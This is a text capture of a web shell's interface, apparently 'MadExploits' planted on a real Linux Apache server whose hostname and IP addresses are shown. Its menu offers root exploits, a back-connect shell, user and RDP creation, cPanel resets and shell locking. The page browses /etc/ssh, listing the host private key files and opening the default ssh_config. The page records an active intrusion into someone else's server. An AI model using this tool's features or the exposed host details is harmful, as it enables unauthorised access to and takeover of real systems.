Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.71.254.75
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
ssh /
[ HOME SHELL ]
Name
Size
Permission
Action
ssh_config.d
[ DIR ]
drwxr-xr-x
sshd_config.d
[ DIR ]
drwx------
moduli
564.54
KB
-rw-r--r--
ssh_config
1.88
KB
-rw-r--r--
ssh_host_dsa_key
668
B
-rw-------
ssh_host_dsa_key.pub
620
B
-rw-r--r--
ssh_host_ecdsa_key
492
B
-rw-r-----
ssh_host_ecdsa_key.pub
162
B
-rw-r--r--
ssh_host_ed25519_key
387
B
-rw-r-----
ssh_host_ed25519_key.pub
82
B
-rw-r--r--
ssh_host_key
1.64
KB
-rw-------
ssh_host_key.pub
412
B
-rw-r--r--
ssh_host_rsa_key
1.64
KB
-rw-------
ssh_host_rsa_key.pub
412
B
-rw-r--r--
sshd_config
3.6
KB
-rw-------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ssh_config
# $OpenBSD: ssh_config,v 1.35 2020/07/17 03:43:42 dtucker Exp $ # This is the ssh client system-wide configuration file. See # ssh_config(5) for more information. This file provides defaults for # users, and the values can be changed in per-user configuration files # or on the command line. # Configuration data is parsed as follows: # 1. command line options # 2. user-specific file # 3. system-wide file # Any configuration value is only changed the first time it is set. # Thus, host-specific definitions should be at the beginning of the # configuration file, and defaults at the end. # Site-wide defaults for some commonly used options. For a comprehensive # list of available options, their meanings and defaults, please see the # ssh_config(5) man page. # Host * # ForwardAgent no # ForwardX11 no # PasswordAuthentication yes # HostbasedAuthentication no # GSSAPIAuthentication no # GSSAPIDelegateCredentials no # GSSAPIKeyExchange no # GSSAPITrustDNS no # BatchMode no # CheckHostIP yes # AddressFamily any # ConnectTimeout 0 # StrictHostKeyChecking ask # IdentityFile ~/.ssh/id_rsa # IdentityFile ~/.ssh/id_dsa # IdentityFile ~/.ssh/id_ecdsa # IdentityFile ~/.ssh/id_ed25519 # Port 22 # Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc # MACs hmac-md5,hmac-sha1,umac-64@openssh.com # EscapeChar ~ # Tunnel no # TunnelDevice any:any # PermitLocalCommand no # VisualHostKey no # ProxyCommand ssh -q -W %h:%p gateway.example.com # RekeyLimit 1G 1h # UserKnownHostsFile ~/.ssh/known_hosts.d/%k # # This system is following system-wide crypto policy. # To modify the crypto properties (Ciphers, MACs, ...), create a *.conf # file under /etc/ssh/ssh_config.d/ which will be automatically # included below. For more information, see manual page for # update-crypto-policies(8) and ssh_config(5). Include /etc/ssh/ssh_config.d/*.conf
Close